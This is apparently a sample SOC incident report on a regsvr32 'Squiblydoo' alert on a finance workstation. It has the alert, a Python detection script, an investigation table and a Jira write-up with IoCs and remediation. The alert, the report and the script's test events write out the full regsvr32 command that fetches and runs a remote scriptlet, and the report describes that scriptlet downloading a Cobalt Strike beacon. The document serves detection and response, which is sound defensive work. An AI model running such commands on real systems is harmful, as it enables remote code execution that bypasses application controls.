CrowdStrike Alert Details
Alert ID: CS-REGSVR32-PROXY-1218-7842
Alert Time: 2024-03-10 09:30:15 EST
Severity: HIGH (85/100)
Source: CrowdStrike Falcon EDR
Rule: “Regsvr32.exe Executing Remote COM Object – Potential Squiblydoo”
MITRE ATT&CK: T1218.010 – System Binary Proxy Execution: Regsvr32
Alert Details:
Detection: Regsvr32.exe used to execute remote scriptlet (Squiblydoo technique)
Host: FIN-WS-078 (Finance Workstation)
User: bturner@company.com (Brian Turner, Accountant)
Time: 09:25 EST
Process Tree:
explorer.exe (PID: 2341)
  cmd.exe (PID: 4789)
    regsvr32.exe (PID: 4792)
Command: regsvr32.exe /s /n /u /i:http://185.143.221[.]89/payload.sct scrobj.dll
Command Line: regsvr32 /s /n /u /i:http://185.143.221[.]89/payload.sct scrobj.dll
Detection Logic:
Regsvr32.exe used with /i flag pointing to remote URL (anomalous)
Downloading scriptlet (.sct) from external IP
scrobj.dll (COM scriptlet) loaded
Parent process cmd.exe (unusual for legitimate regsvr32 usage)
Pattern matches “Squiblydoo” technique for executing arbitrary code via trusted binary
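The detection logic above, written out as an added example (not the alert's or CrowdStrike's own rule): it evaluates process-creation events for regsvr32 with a remote /i: target, a .sct argument, scrobj.dll, and an unusual parent. The sample events are constructed, and the IP is a documentation-range placeholder rather than the incident's indicator; UNC paths are treated as remote as well, since scrobj.dll fetches those over the network too.

```python
import re
import shlex
from urllib.parse import urlparse
# Constructed process-creation events (not from the alert above); the IP is a
# documentation-range placeholder, not the indicator from the incident.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\regsvr32.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "regsvr32 /s /n /u /i:http://198.51.100.7/payload.sct scrobj.dll"},
    {"image": r"C:\Windows\System32\regsvr32.exe", "parent": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},
    {"image": r"C:\Windows\System32\regsvr32.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"regsvr32.exe -s -n -i:\\10.0.0.5\share\update.sct scrobj.dll"},
]
REMOTE_SCHEMES = {"http", "https", "ftp"}
SCRIPT_PARENTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "winword.exe", "excel.exe", "outlook.exe"}

def parse_install_arg(cmdline):
    """Return the /i: (or -i:) argument, or None; match both '/' and '-' switch prefixes."""
    try:
        tokens = shlex.split(cmdline, posix=False)   # non-posix: Windows backslashes stay intact
    except ValueError:                               # unbalanced quotes: fall back to whitespace split
        tokens = cmdline.split()
    for tok in tokens:
        m = re.match(r'^[/-]i:(.+)$', tok, re.IGNORECASE)
        if m:
            return m.group(1).strip('"')
    return None

def is_remote_path(arg):
    """URLs and UNC paths both make scrobj.dll fetch the scriptlet over the network."""
    return arg.startswith("\\\\") or urlparse(arg).scheme.lower() in REMOTE_SCHEMES

def evaluate(event):
    """Return the matched indicators for one regsvr32 process-creation event."""
    if not event["image"].lower().endswith("\\regsvr32.exe"):
        return []
    cmd, install = event["cmdline"], parse_install_arg(event["cmdline"])
    parent = event["parent"].lower().rsplit("\\", 1)[-1]
    checks = [
        ("remote /i: target", install is not None and is_remote_path(install)),
        ("scriptlet (.sct) argument", install is not None and install.lower().endswith(".sct")),
        ("scrobj.dll loaded", "scrobj.dll" in cmd.lower()),
        (f"suspicious parent {parent}", parent in SCRIPT_PARENTS),
    ]
    return [name for name, hit in checks if hit]

def verdict(event):
    """Alert on a remote install target; the other indicators only raise confidence."""
    reasons = evaluate(event)
    return ("ALERT" if "remote /i: target" in reasons else "ok", reasons)
```

Running `verdict` over SAMPLE_EVENTS flags the first and third events and passes the vendor DLL registration launched by msiexec.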
Additional Context:
User received phishing email with link earlier
URL payload.sct contains malicious script
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|------|--------|------------|----------|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed regsvr32 remote scriptlet execution |
| 2. URL Analysis | Fetch and analyze payload.sct | URLScan.io, Sandbox | SCT file contains PowerShell download cradle |
| 3. Process Investigation | Identify source | CrowdStrike | User clicked link in email, launched cmd |
| 4. User Interview | Contact bturner | Teams, Phone | User clicked “document” link; unaware |
| 5. Immediate Action | Terminate regsvr32 process | CrowdStrike | Process killed |
| 6. Network Block | Block malicious URL | Palo Alto, Zscaler | URL and IP blocked |
Jira Incident Report
Ticket: SOC-2024-196
Summary: T1218.010 – Regsvr32 Squiblydoo Technique Executing Remote Scriptlet
Status: RESOLVED
Resolution: MALICIOUS – Process Terminated
Priority: P2 – MEDIUM
Labels: T1218, regsvr32, squiblydoo, proxy-execution, crowdstrike
Components: Endpoint-Security, Web-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Regsvr32.exe Executing Remote COM Object – Potential Squiblydoo”.
Host: FIN-WS-078 (Finance, user bturner).
Process: regsvr32.exe with remote scriptlet.
Time: 2024-03-10 09:30 EST.
Technique: MITRE ATT&CK T1218.010 – System Binary Proxy Execution: Regsvr32.
2. Technical Analysis:
Attack Chain:
09:10 – User receives phishing email with link
09:12 – User clicks link
09:13 – Browser triggers cmd.exe (or downloads script that launches cmd)
09:14 – cmd.exe launches regsvr32 with remote scriptlet URL
09:15 – regsvr32 downloads payload.sct from 185.143.221[.]89
09:20 – Scriptlet executes PowerShell (downloading Cobalt Strike)
09:25 – CrowdStrike detects
Regsvr32 Technique:
Binary: C:\Windows\System32\regsvr32.exe (trusted, often allowed)
Flags: /s (silent), /n (no register), /u (unregister), /i:<url> (passes the URL to scrobj.dll's DllInstall, which fetches and runs the scriptlet)
DLL: scrobj.dll (COM scriptlet handler)
Effect: Downloads and executes scriptlet (.sct) which can contain arbitrary script
Payload Analysis:
URL: http://185.143.221[.]89/payload.sct
Content: XML scriptlet with embedded VBScript that runs PowerShell
PowerShell: Downloads and executes Cobalt Strike beacon
Impact:
Scriptlet executed before detection
C2 connection attempted (blocked)
3. Investigation Findings:
Timeline:
09:10 – Email received
09:12 – Link clicked
09:14-09:20 – Scriptlet download and execution
09:25 – Alert
09:27 – SOC investigates
09:28 – Process terminated
Indicators of Compromise (IoCs):
Network:
– URL: http://185.143.221[.]89/payload.sct
– IP: 185.143.221[.]89
Processes:
– regsvr32.exe with /i flag to remote URL
4. Containment Actions:
Immediate Actions:
Terminated regsvr32 process.
Blocked URL and IP at firewall and proxy.
Isolated host temporarily.
Reset user password.
Host Remediation:
Full scan (clean).
No reimage needed.
5. Root Cause Analysis:
Primary Cause: User clicked phishing link.
Contributing Factors:
No web filtering blocking malicious domain.
Regsvr32 allowed to download remote content.
6. Business Impact:
Operational Impact: Finance workstation offline for 1 hour.
Data Exposure: None (C2 blocked).
7. Remediation & Prevention:
Completed Actions:
Malicious process terminated.
User educated.
Technical Controls Enhanced:
Blocked regsvr32 from making outbound connections via firewall.
Enhanced URL filtering.
Created alert for regsvr32 with /i flag.
8. Conclusion:
An attacker used regsvr32.exe with the Squiblydoo technique to download and execute a malicious scriptlet, bypassing application whitelisting. CrowdStrike detected the anomalous behavior and terminated the process.
Closure Rationale: Process terminated; URL blocked; user educated.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-10 10:30 EST